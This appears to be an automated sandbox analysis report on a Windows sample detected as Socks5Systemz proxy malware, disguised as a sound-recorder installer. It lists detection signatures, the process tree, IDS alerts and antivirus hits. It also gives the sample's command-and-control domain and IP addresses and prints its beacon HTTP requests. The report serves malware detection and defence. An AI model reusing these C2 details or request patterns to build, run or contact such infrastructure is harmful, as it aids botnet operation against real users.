
Windows Analysis Report
tOniaJ21lj.exe

Overview

General Information

Sample name:tOniaJ21lj.exe
renamed because original name is a hash value
Original sample name:fa367a7d44377d2c3f684c3912fec827.exe
Analysis ID:1455403
MD5:fa367a7d44377d2c3f684c3912fec827
SHA1:cb9e24a00431a7cccecf333b5d4ec34785389191
SHA256:7256e9f673b78c62aae25f78902c393d758262202e8ab4e4b4f1d5d01cd4cd12
Tags:exeSocks5Systemz

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • tOniaJ21lj.exe (PID: 6220 cmdline: "C:\Users\user\Desktop\tOniaJ21lj.exe" MD5: FA367A7D44377D2C3F684C3912FEC827)
    • tOniaJ21lj.tmp (PID: 2836 cmdline: "C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp" /SL5="$10474,4719378,54272,C:\Users\user\Desktop\tOniaJ21lj.exe" MD5: 8EF7001015E126E74BC41268504CA1E2)
      • recordpadsoundrecorder32.exe (PID: 4368 cmdline: "C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -i MD5: 1F7ED6F21708581170C4BF77C64A9D32)
      • recordpadsoundrecorder32.exe (PID: 1412 cmdline: "C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -s MD5: 1F7ED6F21708581170C4BF77C64A9D32)
  • svchost.exe (PID: 5356 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 list": ["aaxeeeo.ru"]}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-OIVVM.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000000.2036104577.0000000000401000.00000020.00000001.01000000.00000008.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
00000003.00000000.2033651879.0000000000401000.00000020.00000001.01000000.00000008.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000004.00000002.3269669582.000000000097E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
Process Memory Space: recordpadsoundrecorder32.exe PID: 1412 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |

Source | Rule | Description | Author | Strings
3.0.recordpadsoundrecorder32.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
4.0.recordpadsoundrecorder32.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 5356, ProcessName: svchost.exe
                      Timestamp:06/11/24-19:43:31.633412
                      SID:2049467
                      Source Port:52643
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:42:57.171208
                      SID:2049467
                      Source Port:52623
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:26.414769
                      SID:2049467
                      Source Port:52640
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:49.420215
                      SID:2049467
                      Source Port:52655
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:40.013828
                      SID:2049467
                      Source Port:52649
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:07.601992
                      SID:2049467
                      Source Port:52629
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:53.737196
                      SID:2049467
                      Source Port:52658
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:01.749476
                      SID:2049467
                      Source Port:52626
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:10.177838
                      SID:2049467
                      Source Port:52631
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:16.249164
                      SID:2049467
                      Source Port:52635
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:44:00.280298
                      SID:2049467
                      Source Port:52663
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:06.376941
                      SID:2049467
                      Source Port:52628
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:00.233904
                      SID:2049467
                      Source Port:52625
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:27.013923
                      SID:2049467
                      Source Port:52641
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:52.482822
                      SID:2049467
                      Source Port:52657
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:11.744384
                      SID:2049467
                      Source Port:52632
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:15.633502
                      SID:2049467
                      Source Port:52634
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:36.034207
                      SID:2049467
                      Source Port:52646
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:45.320897
                      SID:2049467
                      Source Port:52652
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:57.593794
                      SID:2049467
                      Source Port:52661
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:18.748451
                      SID:2049467
                      Source Port:52637
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:08.901351
                      SID:2049467
                      Source Port:52630
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:13.030652
                      SID:2049467
                      Source Port:52633
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:58.873534
                      SID:2049467
                      Source Port:52662
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:42:55.670104
                      SID:2049467
                      Source Port:52621
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:17.515047
                      SID:2049467
                      Source Port:52636
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:34.748394
                      SID:2049467
                      Source Port:52645
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:38.697972
                      SID:2049467
                      Source Port:52648
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:41.371967
                      SID:2049467
                      Source Port:52650
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:47.586566
                      SID:2049467
                      Source Port:52653
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:23.899062
                      SID:2049467
                      Source Port:52639
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:48.123287
                      SID:2049467
                      Source Port:52654
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:34.149022
                      SID:2049467
                      Source Port:52644
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:20.092414
                      SID:2049467
                      Source Port:52638
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:37.280010
                      SID:2049467
                      Source Port:52647
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:56.313009
                      SID:2049467
                      Source Port:52660
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:42.763270
                      SID:2049467
                      Source Port:52651
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:05.666289
                      SID:2049467
                      Source Port:52627
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:50.748248
                      SID:2049467
                      Source Port:52656
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:55.016662
                      SID:2049467
                      Source Port:52659
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:29.603330
                      SID:2049467
                      Source Port:52642
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:42:54.899608
                      SID:2049467
                      Source Port:52618
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:42:58.732763
                      SID:2049467
                      Source Port:52624
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected


                      AV Detection

                      Source: tOniaJ21lj.exeAvira: detected
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmpAvira: detection malicious, Label: ADWARE/AVI.ICLoader.jwrbl
                      Source: C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exeAvira: detection malicious, Label: HEUR/AGEN.1314993
                      Source: recordpadsoundrecorder32.exe.1412.4.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["aaxeeeo.ru"]}
                      Source: C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exeReversingLabs: Detection: 42%
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmpReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\libeay32.dll (copy)ReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeReversingLabs: Detection: 42%
                      Source: tOniaJ21lj.exeReversingLabs: Detection: 21%
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmpJoe Sandbox ML: detected
                      Source: C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0045B864 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045B864
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0045B918 ArcFourCrypt,1_2_0045B918
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0045B930 ArcFourCrypt,1_2_0045B930
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130
                      Source: is-UTKLG.tmp.1.drBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_195b4133-0

                      Compliance

                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeUnpacked PE file: 3.2.recordpadsoundrecorder32.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeUnpacked PE file: 4.2.recordpadsoundrecorder32.exe.400000.0.unpack
                      Source: tOniaJ21lj.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: Binary string: msvcp120.amd64.pdb source: is-FR4FM.tmp.1.dr
                      Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: is-K3HBS.tmp.1.dr
                      Source: Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb++ source: is-8ECK7.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtwinextras\lib\Qt5WinExtras.pdb.. source: is-RV2D1.tmp.1.dr
                      Source: Binary string: msvcr120.amd64.pdb source: is-C4R5U.tmp.1.dr
                      Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: is-EAHN0.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtwinextras\lib\Qt5WinExtras.pdb source: is-RV2D1.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Xml.pdb source: is-KI2RB.tmp.1.dr
                      Source: Binary string: C:\msys64\home\--\src\ffmpeg\libavdevice\avdevice-58.pdb source: is-JNDNQ.tmp.1.dr
                      Source: Binary string: C:\msys64\home\--\src\openh264-2.0.0_x64\openh264.pdb source: is-PRP4U.tmp.1.dr
                      Source: Binary string: C:\msys64\home\--\src\ffmpeg\libavdevice\avdevice-58.pdb## source: is-JNDNQ.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtsvg\lib\Qt5Svg.pdb** source: is-KU10K.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5OpenGL.pdb source: is-0C056.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5OpenGL.pdb33 source: is-0C056.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtsvg\lib\Qt5Svg.pdb source: is-KU10K.tmp.1.dr
                      Source: Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb source: is-8ECK7.tmp.1.dr
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0047A964 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_0047A964
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00470C84 FindFirstFileA,FindNextFileA,FindClose,1_2_00470C84
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00451668 FindFirstFileA,GetLastError,1_2_00451668
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00460594 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00460594
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00492760 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00492760
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0047884C FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_0047884C
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00460A10 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00460A10
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0045F008 FindFirstFileA,FindNextFileA,FindClose,1_2_0045F008
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\user\AppData

                      Networking

                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52618 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52621 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52623 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52624 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52625 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52626 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52627 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52628 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52629 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52630 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52631 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52632 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52633 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52634 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52635 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52636 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52637 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52638 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52639 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52640 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52641 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52642 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52643 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52644 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52645 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52646 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52647 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52648 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52649 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52650 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52651 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52652 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52653 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52654 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52655 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52656 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52657 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52658 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52659 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52660 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52661 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52662 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52663 -> 94.156.8.14:80
Source: Malware configuration extractor; URLs: aaxeeeo.ru
Source: global traffic; TCP traffic: 192.168.2.5:52619 -> 194.59.31.219:2023
Source: Joe Sandbox View; IP Address: 94.156.8.14
Source: Joe Sandbox View; IP Address: 194.59.31.219
Source: Joe Sandbox View; ASN Name: NET1-ASBG
Source: global traffic; HTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ff710c2e8929d3d HTTP/1.1 Host: aaxeeeo.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic; HTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1 Host: aaxeeeo.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: unknown; TCP traffic detected without corresponding DNS query: 194.59.31.219
Source: unknown; UDP traffic detected without corresponding DNS query: 152.89.198.214
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe; Code function: 4_2_026072A7 Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,_free,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,_free, 4_2_026072A7
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
